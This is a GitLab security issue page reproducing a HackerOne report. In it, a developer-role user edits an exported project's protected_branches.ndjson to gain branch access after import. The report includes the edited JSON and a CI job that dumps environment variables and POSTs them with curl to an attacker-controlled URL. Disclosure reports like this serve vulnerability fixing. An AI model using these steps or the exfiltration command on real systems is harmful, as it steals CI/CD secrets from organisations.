Skip to content

User with developer role (group) can modify Protected branches setting on imported project and leak group CI/CD variables

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #1939987 by js_noob on 2023-04-09, assigned to @fvpotvin:

Report | Attachments | How To Reproduce

Report

Summary

Hello team, a user with a developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches on an imported project (tree/project/protected_branches.ndjson file). This is done with no victim interaction needed.

Steps to reproduce
  1. Create 2 accounts
  2. Create a group with account A and masked CI/CD group variables (Group settings -> CI/CD -> Variables)

image.png

  1. Create a personal project with account B and export it
  2. Invite account B (developer) to account A's (owner) group
  3. With account B, modify the project import file, go to tree/project/protected_branches.ndjson
  4. Set all occurrences of access_level to null and all occurrences of user_id to the developer's user id, it will look similar to this
{"project_id":44833383,"name":"main","created_at":"2023-04-02T13:43:17.065Z","updated_at":"2023-04-02T13:43:17.065Z","code_owner_approval_required":false,"allow_force_push":false,"merge_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.067Z","updated_at":"2023-04-02T13:43:17.067Z","user_id":12794759,"group_id":null}],"push_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.069Z","updated_at":"2023-04-02T13:43:17.069Z","user_id":12794759,"group_id":null}],"unprotect_access_levels":[]}
  1. Tar the changes and upload the modified project to account A's group with account B
  2. The default access should be to maintainers only however, it is fully accessible by the developer

image.png

  1. Create a .gitlab-ci.yml file with the following content
image: ruby:latest

job_name:    
 script:    
   - export > test.txt    
   - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
  1. Commit and verify the group CI/CD variables bring disclosed

For simplicity you can create the vars in step 2 unmasked and in the .gitlab-ci.yml you have the following content:

image: ruby:latest

job_name:    
 script:    
   - echo $VAR

Just to make things easier so we don't require a server.

Reference

#353958 (closed)

Video/POC

Redacted

Impact

Users with developer role (group) can steal masked group and project CI/CD variables. The developer can also modify main branch without the maintainer's permission.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section:

Edited by Félix Veillette-Potvin